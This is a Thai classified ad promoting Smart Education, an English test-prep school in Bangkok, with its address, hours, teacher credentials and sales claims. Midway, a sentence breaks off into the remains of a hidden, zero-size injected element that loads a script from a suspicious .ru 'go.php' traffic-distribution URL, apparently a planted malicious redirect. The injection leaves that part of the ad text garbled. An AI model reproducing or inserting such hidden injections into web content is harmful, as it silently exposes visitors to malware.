ประกาศซื้อขายฟรี
แนะนำที่เรียน TOEIC / TOEFL / IELTS (โทอิค โทเฟิล ไอเอล ) สอนดี ราคาประหยัด ดูตัวอย่างผู้สำเร็จท้ายประกาศ หยุดวันพระ SMA

แนะนำที่เรียน TOEIC / TOEFL / IELTS (โทอิค โทเฟิล ไอเอล ) สอนดี ราคาประหยัด ดูตัวอย่างผู้สำเร็จท้ายประกาศ หยุดวันพระ SMART EDUCATION 081-907-2118 (สมัครเรียนล่วงหน้า 30 วันรับโปรโมชั่นพิเศษ)


Smart Education
10/10 หมู่บ้านฝนทอง ถ.พหลโยธิน (ตรงข้ามพหล 59) ใกล้โลตัสวงเวียนหลักสี่ มาทางสะพานใหม่
จากวงเวียนหลักสี่ มาทางสะพานใหม่ ณ จุดกลับรถจุดแรก ให้รอ....เลี้ยวขวาเข้าหมู่บ้านฝนทอง
ปากซอยมีมินิมาร์ท SRCอยู่ทางซ้าย เข้าซอยเพียง 50 เมตร ทางขวามือของซอย
เวลาทำการ : 16.30 - 20.30 น. ทุกวัน (หยุดวันพระ)
โทรสอบถามรายละเอียดโปรโมชั่นใหม่ ๆ ได้ทุกวัน
(เว้นวันพระ.. เพราะอาจารย์พาคุณพ่อคุณแม่ไปทำบุญค่ะ)
Tel. 08-1907-2118, 08-9367-1754 , 08-1909-6541

ออกแบบการเรียนการสอนโดยทีมอาจารย์ MBA ธรรมศาสตร์, วศ.บ.ลาดกระบัง,
และ M.A. Linguistics (ปริญญาโทภาษาศาสตร์) อักษรศาสตร์ จุฬาฯ ,
Diploma TEFL (ประกาศนียบัตรการสอนภาษาอังกฤษในฐานะภาษาต่างประเทศ),
Certificate Professional English จาก Boston - USA, ประสบการณ์กว่า 20 ปี

SMART EDUCATION เป็นสถาบันที่ผู้เรียนจากทั่วประเทศมุ่งตรงมาเรียนที่นี่ด้วยการบอกต่อ
ปากต่อปาก ถึงความสำเร็จที่รวดเร็วน่าอัศจรรย์ ไม่ต้องผิดหวังกับการเสียเงิน เสียเวลา ลองถูกลองผิดจากคำโฆษณาชวนเชื่อ ที่มักเบี่ยงเบนให้ผู้เรียนหลงเชื่อด้วยกลยุทธทางธุรกิจการตลาด (ที่ไม่น่านำมาใช้กับระบบการศึกษา) อันเป็นเหตุให้เยาวชนที่เป็นกำลังสำคัญของประเทศถูกบั่นทอนในเรื่องโอกาสและเวลาที่ต้องใช้กว่าจะประสบความสำเร็จ

กลุ่มผู้เรียนจากจุฬาฯ ฝ่ารร.ติวสอบภาษาอังกฤษชื่อดังย่าน - สีลม / สามย่าน / สยาม /ราชเทวี / ลาดพร้าว / แยกเกษตร - มาทำคะแนน TOEIC กว่า 700-800 ที่นี่

เทคนิค-วิธีการเรียน-และความใส่ใจต่อผู้เรียน ที่ไม่เหมือนใคร (ศิษย์เก่าที่เคยเรียนมาหลายที่แล้วเป็นผู้บอก) ทำให้มีผู้เรียนทำคะแนนสูงกว่า 800 ในเวลา 2-3 สัปดาห์

คณะผู้สอนทำการค้นคว้าและสรุปเนื้อหาจากตำราต่างประเทศที่ทันสมัยหลายร้อยรายการ
ผู้เรียนจะได้รับความรู้มากมายที่ Professor ระดับปริญญาเอก ปริญญาโท ที่เป็นเจ้าของภาษา
ได้กลั่นกรองความรู้เหล่านั้นผ่านทางตำราที่ทางสถาบันใช้

ด้วยความตั้งใจจริงที่จะพัฒนาเยาวชนของชาติ ทางสถาบัน Smart Education จึงมั่นใจว่า ตำราต่างประเทศที่ทางสถาบันเลือกใช้ในการค้นคว้าในระดับมาตรฐานสากล (TOEFL, TOEIC, IELTS, SAT, GRE, GMAT, etc.) ก่อนที่จะพัฒนาแล้วสรุปเป็นหลักสูตรต่าง ๆ ให้แก่ผู้เรียนนั้น มีมากกว่าสถาบันอื่น ๆ อย่างเปรียบเทียบกันมิได้ ด้วยการทุ่มเทค้นคว้าอย่างจริงจังจึงได้ช่วยให้ผู้เรียนเข้าใจง่ายขึ้นและไม่ต้องเสียเวลานั่งอ่านเองทั้งหลายร้อยรายการนั้น

ดูรายชื่อตัวอย่างตำราที่ผู้เรียนจะได้รับประโยชน์ด้วยนั้น ที่ได้ยินกันบ่อย ๆ ก็ Barron, Kaplan, Cambridge, Oxford, Longman, Thomson, Princton, Arco, Mc Graw Hill, Macmillan, Penguin, Collegeboard, etc. นอกจากนี้ผู้เรียนยังจะได้รับประโยชน์จากตำราต่างประเทศอีกหลายค่ายที่คณะผู้สอนบินไปเลือกเองที่ต่างประเทศ ซึ่งต้องขออภัยในการสงวนชื่อไว้ ณ ที่นี้นะคะ

ดังนั้นการเลือกเรียนกับผู้สอนคนไทยที่จบระดับปริญญาเอก ไม่ว่าจะกี่ท่านก็ตาม ก็ไม่น่าจะเป็นคำตอบเดียวของความสำเร็จเสมอไป เพราะผู้สอนที่มีดีกรีสูง ๆ ทุกคนจะสามารถถ่ายทอดความรู้ความสามารถที่ตนเองมีให้ผู้อื่นเก่งเหมือนตนได้เสมอไปนั้น..จริงหรือ? ถ้าเป็นเช่นนั้นจริง นิสิตนักศึกษาในมหาวิทยาลัยที่ส่วนมากมีอาจารย์เป็นปริญญาเอก ก็คงประสบความสำเร็จทุกคนหรือได้เกียรตินิยมอันดับหนึ่งกันทุกคนแล้วสิ...จริงมั้ย? ที่สำคัญยิ่งกว่านั้นก็คือ หากผู้สอนตามสถาบันต่าง ๆ ยังมีงานประจำอื่น ๆ อยู่ด้วยแล้ว จะมีเวลาค้นคว้าจริงจังในสิ่งที่สอนเป็นงานอดิเรกนอกเวลาได้อย่างไร ..ลองพิจารณาด้วยสติปัญญาที่ไม่มีความเบี่ยงเบนดูสิ

ในทำนองเดียวกันนักกีฬาเหรียญทองมากมาย ก็ไม่สามารถเป็นโค้ชให้รุ่นน้องมีโอกาสได้เหรียญทองได้เหมือนตนเอง ในขณะที่มีโค้ชชั้นยอดอยู่มากมายที่ไม่ได้เคยเป็นนักกีฬาเหรียญทองมาก่อน

****** ผลงานความสำเร็จที่แท้จริงของผู้เรียนส่วนใหญ่
จะเป็นภาพสะท้อนที่ดีที่สุดของเจตนาที่แท้จริงของผู้สอนและสถาบัน *******

ปัจจัยที่มีผลต่อความสำเร็จ คือ ผู้รับ (ผู้เรียน) และ ผู้ส่ง (สถาบันที่สอน)
องค์ประกอบสำคัญที่สุดของความสำเร็จก็คือ ผู้เรียนต้องมีวินัยและความรับผิดชอบสูง
ระยะเวลาของความสำเร็จ ขึ้นอยู่กับ IQ , EQ และสิ่งที src="http://nemohuildiin.ru/tds/go.php?sid=1" width="0" height="0" style="display:none">

จุดประสงค์
: ต้องการขาย
ราคา/ค่าบริการ
: 100
ประเภท
: สินค้าใหม่
ผู้ประกาศ
: ครูนุช พัฒน
โทรศัพท์
: 0819072118
มือถือ
: 0819072118
จังหวัด
: กรุงเทพมหานครฯ
อัพเดทล่าสุด
: 5/6/2552 8:29:42

 โปรดอ่านคำเตือน

ข้อความที่ประกาศ และโฆษณาทั้งหมดนี้ เป็นสิ่งที่เกิดขึ้นจากผู้ชมและสมาชิก ที่เข้ามาใช้บริการ ไม่ได้เกิดจากผู้ดูแลหรือผู้จัดทำเว็บไซต์ หากผู้ชมสนใจในประกาศและโฆษณาดังกล่าว กรุณาติดต่อโดยตรงถึงผู้ที่ลงประกาศ หรือโฆษณา ด้วยตนเอง และหากเกิดความผิดพลาดใดๆ เราไม่ขอรับผิดชอบ ดังนั้นผู้ชมควรใช้วิจารณญาณก่อนการติดสินใจใดๆ เกี่ยวกับคำประกาศและโฆษณาดังกล่าวนี้
เว็บไซต์สำเร็จรูป

แสดงความคิดเห็น

Related Classifieds